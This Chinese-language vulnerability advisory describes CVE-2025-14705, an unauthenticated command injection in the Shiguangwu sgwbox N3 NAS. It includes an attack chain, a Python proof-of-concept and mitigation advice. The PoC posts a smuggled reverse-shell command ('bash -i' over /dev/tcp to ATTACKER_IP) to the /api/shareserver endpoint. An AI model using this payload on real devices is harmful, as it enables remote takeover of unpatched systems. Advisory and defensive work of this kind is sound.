IPBUF安全漏洞报告
English
CVE-2025-14705 CVSS 9.8 严重

CVE-2025-14705 Shiguangwu sgwbox N3命令注入漏洞

披露日期: 2025-12-15

漏洞信息

漏洞编号
CVE-2025-14705
漏洞类型
命令注入
CVSS评分
9.8 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Shiguangwu sgwbox N3

相关标签

CVE-2025-14705命令注入远程代码执行ShiguangwusgwboxNASSHARESERVER无需认证严重漏洞

漏洞概述

CVE-2025-14705是Shiguangwu公司开发的sgwbox N3 NAS设备中存在的一个严重命令注入漏洞。该漏洞影响版本2.0.25,存在于SHARESERVER功能组件中。攻击者可以通过构造恶意的params参数,在受影响设备上执行任意操作系统命令。由于该漏洞的CVSS评分高达9.8,属于严重级别,且可被远程利用无需认证,因此对互联网上的暴露资产构成极大威胁。漏洞已于2025年12月15日公开披露,厂商在收到提前通知后未做出任何回应,目前尚无官方补丁发布。

技术细节

该命令注入漏洞位于sgwbox N3的SHARESERVER功能模块中。攻击者通过构造特定的params参数,利用系统命令拼接执行机制,将恶意命令注入到底层操作系统。攻击者可以利用HTTP/HTTPS请求远程触发该漏洞,无需任何认证凭证。由于该设备通常部署在网络边界用于文件共享服务,攻击成功后可完全控制设备根文件系统,进而可能横向移动到内网其他系统。攻击成功后可执行任意shell命令、读取敏感配置文件、植入后门或建立持久化控制。

攻击链分析

STEP 1
步骤1
攻击者识别目标sgwbox N3设备,通过端口扫描发现SHARESERVER服务暴露
STEP 2
步骤2
构造包含恶意命令的params参数,如包含反弹shell或文件读取命令
STEP 3
步骤3
向/api/shareserver端点发送POST请求,触发命令注入
STEP 4
步骤4
漏洞利用成功后,攻击者获得设备shell权限,可执行任意系统命令
STEP 5
步骤5
攻击者可读取敏感配置、植入后门、横向移动到内网其他系统

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests import sys # CVE-2025-14705 PoC - Shiguangwu sgwbox N3 Command Injection # Target: SHARESERVER component target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target:8080" # Reverse shell payload - modify LHOST/LPORT as needed cmd = ";bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" # Exploit the SHARESERVER component endpoint = f"{target_url}/api/shareserver" payload = { "params": cmd } print(f"[*] Exploiting CVE-2025-14705 on {target_url}") print(f"[*] Sending payload: {cmd}") try: response = requests.post(endpoint, data=payload, timeout=10) print(f"[+] Response Status: {response.status_code}") print(f"[+] Response: {response.text}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}")

影响范围

Shiguangwu sgwbox N3 2.0.25

防御指南

临时缓解措施
由于厂商未回应且暂无官方补丁,建议立即将设备从互联网移除或通过防火墙限制访问仅允许可信IP访问。对于必须暴露的服务,可临时在网络层过滤包含特殊字符(如;、|、$、&等)的请求参数,并启用入侵检测系统监控异常行为。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表